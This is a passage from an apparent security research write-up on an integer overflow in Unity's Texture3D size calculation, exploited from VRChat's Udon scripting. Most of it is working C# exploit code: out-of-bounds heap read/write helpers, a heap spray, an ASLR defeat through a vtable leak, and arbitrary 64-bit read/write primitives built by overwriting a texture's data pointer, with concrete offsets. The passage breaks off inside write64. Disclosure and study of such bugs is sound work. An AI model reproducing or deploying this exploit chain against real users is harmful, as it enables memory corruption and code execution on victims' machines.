<p><img src="/img/vrcescape/clobbered.png" alt="" /></p>
<h1 id="the-bug">The Bug<a class="zola-anchor" href="#the-bug" aria-label="Anchor link for: the-bug"><i class="fas fa-link"></i></a>
</h1>
<p><strong>NOTE: If you want to play along at home or are interested in doing your own reverse engineering work, Unity has a <a rel="external" href="https://docs.unity3d.com/Manual/WindowsDebugging.html">public symbol store</a> that provides PDBs with symbol names for most Windows Unity builds. Although the specific build VRChat used at the time doesn't appear to be on there, <code>2022.3.22f1</code> is close to it and is more than enough for reverse engineering.</strong></p>
<p>When creating a 3D texture <em>(see <code>Texture3D::InitTexture</code>)</em>, Unity passes the texture's width, height, format, and mipmap count into a function called <code>ComputeTextureSize</code>.</p>
<p><img src="/img/vrcescape/wtfunity1.png" alt="" /></p>
<p>Notice that explicit texture size check? Not only that, but according to the disassembly, <code>ComputeTextureSize</code> should be returning an unsigned 64-bit integer, which should easily fit the real size of the texture with no problem. What's up with that?</p>
<p><img src="/img/vrcescape/wtfunity2.png" alt="" /></p>
<p><code>ComputeTextureSize</code> loops over every mipmap level of the texture and calculates the size for each level. I won't go into full detail on how this function works because most of it is irrelevant, but the important part is here:</p>
<p><img src="/img/vrcescape/wtfunity3.png" alt="" /></p>
<p>The function calculates the size for each layer as a signed 32-bit integer, then sign extends the result to 64 bits before adding it to the total texture size. This is fine for figuring out if a texture is greater than 2GB but less than 4GB, since the sign extension will result in a massive unsigned 64-bit integer, failing the caller's size check.</p>
<p>However, values over 4GB will wrap around due to overflow. That means on a 4GB texture with no mipmaps, <code>ComputeTextureSize</code> returns 0, bypassing the size check. The miscalculated size also gets used to allocate the texture buffer, leading to a trivial out-of-bounds heap read/write primitive with a controlled offset via pixel getters and setters.</p>
<p>Now, with that out of the way, it's finally time to write a full exploit!</p>
<h1 id="from-out-of-bounds-to-everywhere">From Out-of-Bounds to Everywhere<a class="zola-anchor" href="#from-out-of-bounds-to-everywhere" aria-label="Anchor link for: from-out-of-bounds-to-everywhere"><i class="fas fa-link"></i></a>
</h1>
<p>While an out-of-bounds heap read/write within 4GB relative to the broken allocation is great and all, it'd be nicer be able to access memory at any address. To do this, I'll use the OOB texture to overwrite the data pointer of another texture object, then use that texture to read/write memory at that address.</p>
<p>First, a couple of helper functions to make dealing with the OOB memory primitive easier:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #6A9955;">// Will be initialized later</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private</span><span style="color: #4EC9B0;"> Texture3D</span><span style="color: #9CDCFE;"> oob</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> null</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">private uint</span><span style="color: #DCDCAA;"> read32Rel</span><span>(</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> offset</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #9CDCFE;">offset</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 4</span><span style="color: #D4D4D4;"> !=</span><span style="color: #B5CEA8;"> 0</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // UdonSharp doesn't want to compile exceptions, so this will have to do</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">LogError</span><span>(</span><span style="color: #CE9178;">$"read32Rel: Offset </span><span style="color: #D4D4D4;">{</span><span style="color: #9CDCFE;">offset</span><span style="color: #D4D4D4;">}</span><span style="color: #CE9178;"> must be aligned!!!"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span style="color: #B5CEA8;"> 0x41414141</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> int</span><span style="color: #9CDCFE;"> coord</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> offset</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 4</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> var</span><span style="color: #9CDCFE;"> pixel</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> oob</span><span>.</span><span style="color: #DCDCAA;">GetPixel</span><span>(</span><span style="color: #9CDCFE;">coord</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> coord</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> coord</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span> ((</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">pixel</span><span>[</span><span style="color: #B5CEA8;">3</span><span>]</span><span style="color: #D4D4D4;"> *</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 24</span><span>)</span><span style="color: #D4D4D4;"> |</span><span> ((</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">pixel</span><span>[</span><span style="color: #B5CEA8;">2</span><span>]</span><span style="color: #D4D4D4;"> *</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 16</span><span>)</span><span style="color: #D4D4D4;"> |</span><span> ((</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">pixel</span><span>[</span><span style="color: #B5CEA8;">1</span><span>]</span><span style="color: #D4D4D4;"> *</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 8</span><span>)</span><span style="color: #D4D4D4;"> |</span><span> (</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">pixel</span><span>[</span><span style="color: #B5CEA8;">0</span><span>]</span><span style="color: #D4D4D4;"> *</span><span style="color: #B5CEA8;"> 0xFF</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">private void</span><span style="color: #DCDCAA;"> write32Rel</span><span>(</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> offset</span><span>,</span><span style="color: #569CD6;"> uint</span><span style="color: #9CDCFE;"> data</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #9CDCFE;">offset</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 4</span><span style="color: #D4D4D4;"> !=</span><span style="color: #B5CEA8;"> 0</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">LogError</span><span>(</span><span style="color: #CE9178;">$"write32Rel: Offset </span><span style="color: #D4D4D4;">{</span><span style="color: #9CDCFE;">offset</span><span style="color: #D4D4D4;">}</span><span style="color: #CE9178;"> must be aligned!!!"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> int</span><span style="color: #9CDCFE;"> coord</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> offset</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 4</span><span>;</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;"> Color</span><span style="color: #9CDCFE;"> pixel</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Color</span><span>((</span><span style="color: #9CDCFE;">data</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>, ((</span><span style="color: #9CDCFE;">data</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 8</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>, ((</span><span style="color: #9CDCFE;">data</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 16</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>, ((</span><span style="color: #9CDCFE;">data</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 24</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>);</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> oob</span><span>.</span><span style="color: #DCDCAA;">SetPixel</span><span>(</span><span style="color: #9CDCFE;">coord</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> coord</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> coord</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> pixel</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>In order to modify another object using the OOB texture, it has to be allocated right after its texture data on the heap.</p>
<p>Thankfully, Unity uses a custom heap allocator based on <a rel="external" href="https://github.com/mattconte/tlsf">tlsf</a> that's very easy to manipulate. All I have to do is allocate a bunch of similarly sized objects to fill the free memory holes in the heap before creating the main OOB texture, which should place the its allocation at the end. Then, any new allocations should be accessible from the OOB read/write primitive.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #569CD6;">private</span><span style="color: #4EC9B0;"> Texture3D</span><span>[]</span><span style="color: #9CDCFE;"> spray1</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Texture3D</span><span>[</span><span style="color: #B5CEA8;">16384</span><span>];</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private</span><span style="color: #4EC9B0;"> Texture3D</span><span>[]</span><span style="color: #9CDCFE;"> spray2</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Texture3D</span><span>[</span><span style="color: #B5CEA8;">1024</span><span>];</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Try to fill any holes in the heap</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// Better to have the spray objects be the exactly the same size as the OOB texture</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// These are stored in an array to prevent them from being unexpectedly garbage collected</span></span>
<span class="giallo-l"><span style="color: #C586C0;">for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> <</span><span style="color: #9CDCFE;"> spray1</span><span>.</span><span style="color: #9CDCFE;">Length</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> var</span><span style="color: #9CDCFE;"> temp</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Texture3D</span><span>(</span><span style="color: #B5CEA8;">2048</span><span>,</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #B5CEA8;"> 256</span><span>,</span><span style="color: #9CDCFE;"> TextureFormat</span><span>.</span><span style="color: #9CDCFE;">RGBA32</span><span>,</span><span style="color: #569CD6;"> false</span><span>,</span><span style="color: #569CD6;"> false</span><span>);</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> spray1</span><span>[</span><span style="color: #9CDCFE;">i</span><span>]</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> temp</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Set up OOB read/write texture</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;">oob</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Texture3D</span><span>(</span><span style="color: #B5CEA8;">2048</span><span>,</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #B5CEA8;"> 256</span><span>,</span><span style="color: #9CDCFE;"> TextureFormat</span><span>.</span><span style="color: #9CDCFE;">RGBA32</span><span>,</span><span style="color: #569CD6;"> false</span><span>,</span><span style="color: #569CD6;"> false</span><span>);</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;">Debug</span><span>.</span><span style="color: #DCDCAA;">Log</span><span>(</span><span style="color: #CE9178;">"oob texture created successfully"</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Spray Texture3Ds to eventually turn one of them into an arbitrary read/write primitive</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// They're more convenient than Texture2D because they don't have an extra layer of indirection for the data pointer</span></span>
<span class="giallo-l"><span style="color: #C586C0;">for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> <</span><span style="color: #9CDCFE;"> spray2</span><span>.</span><span style="color: #9CDCFE;">Length</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> var</span><span style="color: #9CDCFE;"> temp</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Texture3D</span><span>(</span><span style="color: #B5CEA8;">1</span><span>,</span><span style="color: #B5CEA8;"> 1</span><span>,</span><span style="color: #B5CEA8;"> 1</span><span>,</span><span style="color: #9CDCFE;"> TextureFormat</span><span>.</span><span style="color: #9CDCFE;">RGBA32</span><span>,</span><span style="color: #569CD6;"> false</span><span>,</span><span style="color: #569CD6;"> false</span><span>);</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> spray2</span><span>[</span><span style="color: #9CDCFE;">i</span><span>]</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> temp</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>Once that's done, I can search for and modify one of the sprayed dummy textures in OOB memory in order to have both a reference to the object in C# and its raw memory. The object search also doubles as a way to find <code>UnityPlayer.dll</code>'s base address in order to defeat ASLR.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #569CD6;">private const uint</span><span style="color: #9CDCFE;"> TEX3D_VTBL_RVA</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0x197D288</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private ulong</span><span style="color: #9CDCFE;"> unityPlayerBase</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private int</span><span style="color: #9CDCFE;"> arbTexOffset</span><span style="color: #D4D4D4;"> = -</span><span style="color: #B5CEA8;">1</span><span>;</span><span style="color: #6A9955;"> // arbTex's offset relative to the OOB texture</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private</span><span style="color: #4EC9B0;"> Texture3D</span><span style="color: #9CDCFE;"> arbTex</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> null</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Try to find one of the sprayed Texture3Ds</span></span>
<span class="giallo-l"><span style="color: #C586C0;">for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> <</span><span style="color: #B5CEA8;"> 4096</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> +=</span><span style="color: #B5CEA8;"> 8</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // All 64-bit modules with ASLR have the top 24 bits of their base set to 0x00007F</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // In order to check if the leaked pointer is Texture3D's vtable,</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // the expected relative address gets subtracted and the result has to be page-aligned</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> ulong</span><span style="color: #9CDCFE;"> leak</span><span style="color: #D4D4D4;"> =</span><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #DCDCAA;">read32Rel</span><span>(</span><span style="color: #9CDCFE;">i</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 4</span><span>)</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 32</span><span>)</span><span style="color: #D4D4D4;"> |</span><span style="color: #DCDCAA;"> read32Rel</span><span>(</span><span style="color: #9CDCFE;">i</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (((</span><span style="color: #9CDCFE;">leak</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 40</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFFFFFF</span><span>)</span><span style="color: #D4D4D4;"> ==</span><span style="color: #B5CEA8;"> 0x7F</span><span style="color: #D4D4D4;"> &&</span><span> ((</span><span style="color: #9CDCFE;">leak</span><span style="color: #D4D4D4;"> -</span><span style="color: #9CDCFE;"> TEX3D_VTBL_RVA</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFFF</span><span>)</span><span style="color: #D4D4D4;"> ==</span><span style="color: #B5CEA8;"> 0</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">Log</span><span>(</span><span style="color: #CE9178;">$"found texture3d at oob rel 0x</span><span style="color: #D4D4D4;">{</span><span style="color: #9CDCFE;">i</span><span style="color: #D4D4D4;">:</span><span style="color: #9CDCFE;">X</span><span style="color: #D4D4D4;">}</span><span style="color: #CE9178;">"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> unityPlayerBase</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> leak</span><span style="color: #D4D4D4;"> -</span><span style="color: #9CDCFE;"> TEX3D_VTBL_RVA</span><span>;</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> arbTexOffset</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> i</span><span>;</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> break</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"><span style="color: #C586C0;">if</span><span> (</span><span style="color: #9CDCFE;">arbTexOffset</span><span style="color: #D4D4D4;"> == -</span><span style="color: #B5CEA8;">1</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">LogError</span><span>(</span><span style="color: #CE9178;">"failed to find texture3d to corrupt"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Modify its width and try to find the object in the spray2 array</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// In testing, the initial heap spray worked so well that it always used spray2[0] as the target</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// Still, better safe than sorry!</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;">write32Rel</span><span>(</span><span style="color: #9CDCFE;">arbTexOffset</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 0x118</span><span>,</span><span style="color: #B5CEA8;"> 2</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;">for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> <</span><span style="color: #9CDCFE;"> spray2</span><span>.</span><span style="color: #9CDCFE;">Length</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #9CDCFE;">spray2</span><span>[</span><span style="color: #9CDCFE;">i</span><span>].</span><span style="color: #9CDCFE;">width</span><span style="color: #D4D4D4;"> ==</span><span style="color: #B5CEA8;"> 2</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">Log</span><span>(</span><span style="color: #CE9178;">$"found corrupted texture3d! spray2[0x</span><span style="color: #D4D4D4;">{</span><span style="color: #9CDCFE;">i</span><span style="color: #D4D4D4;">:</span><span style="color: #9CDCFE;">X</span><span style="color: #D4D4D4;">}</span><span style="color: #CE9178;">] with width </span><span style="color: #D4D4D4;">{</span><span style="color: #9CDCFE;">spray2</span><span style="color: #D4D4D4;">[</span><span style="color: #9CDCFE;">i</span><span style="color: #D4D4D4;">].</span><span style="color: #9CDCFE;">width</span><span style="color: #D4D4D4;">}</span><span style="color: #CE9178;">"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> arbTex</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> spray2</span><span>[</span><span style="color: #9CDCFE;">i</span><span>];</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> break</span><span>;</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"><span style="color: #C586C0;">if</span><span> (</span><span style="color: #9CDCFE;">arbTex</span><span style="color: #D4D4D4;"> ==</span><span style="color: #569CD6;"> null</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">LogError</span><span>(</span><span style="color: #CE9178;">"failed to find corrupted texture3d"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>Finally, I can construct an arbitrary read/write primitive by overwriting the data pointer. Since the target texture is now RGBA32 2x1x1, I can read/write 64 bits at a time, which is the perfect amount to be useful for exploit setup.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #569CD6;">private ulong</span><span style="color: #DCDCAA;"> read64</span><span>(</span><span style="color: #569CD6;">ulong</span><span style="color: #9CDCFE;"> addr</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Overwrite the texture data pointer</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> write32Rel</span><span>(</span><span style="color: #9CDCFE;">arbTexOffset</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 0x128</span><span>, (</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">addr</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFFFFFFFF</span><span>));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> write32Rel</span><span>(</span><span style="color: #9CDCFE;">arbTexOffset</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 0x12C</span><span>, (</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">addr</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 32</span><span>));</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;"> var</span><span style="color: #9CDCFE;"> data</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> arbTex</span><span>.</span><span style="color: #DCDCAA;">GetPixels32</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span style="color: #9CDCFE;"> data</span><span>[</span><span style="color: #B5CEA8;">0</span><span>][</span><span style="color: #B5CEA8;">0</span><span>]</span><span style="color: #D4D4D4;"> |</span></span>
<span class="giallo-l"><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">data</span><span>[</span><span style="color: #B5CEA8;">0</span><span>][</span><span style="color: #B5CEA8;">1</span><span>]</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 8</span><span>)</span><span style="color: #D4D4D4;"> |</span></span>
<span class="giallo-l"><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">data</span><span>[</span><span style="color: #B5CEA8;">0</span><span>][</span><span style="color: #B5CEA8;">2</span><span>]</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 16</span><span>)</span><span style="color: #D4D4D4;"> |</span></span>
<span class="giallo-l"><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">data</span><span>[</span><span style="color: #B5CEA8;">0</span><span>][</span><span style="color: #B5CEA8;">3</span><span>]</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 24</span><span>)</span><span style="color: #D4D4D4;"> |</span></span>
<span class="giallo-l"><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">data</span><span>[</span><span style="color: #B5CEA8;">1</span><span>][</span><span style="color: #B5CEA8;">0</span><span>]</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 32</span><span>)</span><span style="color: #D4D4D4;"> |</span></span>
<span class="giallo-l"><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">data</span><span>[</span><span style="color: #B5CEA8;">1</span><span>][</span><span style="color: #B5CEA8;">1</span><span>]</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 40</span><span>)</span><span style="color: #D4D4D4;"> |</span></span>
<span class="giallo-l"><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">data</span><span>[</span><span style="color: #B5CEA8;">1</span><span>][</span><span style="color: #B5CEA8;">2</span><span>]</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 48</span><span>)</span><span style="color: #D4D4D4;"> |</span></span>
<span class="giallo-l"><span> ((</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">data</span><span>[</span><span style="color: #B5CEA8;">1</span><span>][</span><span style="color: #B5CEA8;">3</span><span>]</span><span style="color: #D4D4D4;"> <<</span><span style="color: #B5CEA8;"> 56</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">private void</span><span style="color: #DCDCAA;"> write64</span><span>(</span><span style="color: #569CD6;">ulong</span><span style="color: #9CDCFE;"> addr</span><span>,</span><span style="color: #569CD6;"> ulong</span><span style="color: #9CDCFE;"> val</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> write32Rel</span><span>(</span><span style="color: #9CDCFE;">arbTexOffset</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 0x128</span><span>, (</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">addr</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFFFFFFFF</span><span>));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> write32Rel</span><span>(</span><span style="color: #9CDCFE;">arbTexOffset</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 0x12C</span><span>, (</span><span style="color: #569CD6;">uint</span><span>)(</span><span style="color: #9CDCFE;">addr</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 32</span><span>));</span></span>
<span class="giallo-l"></span>
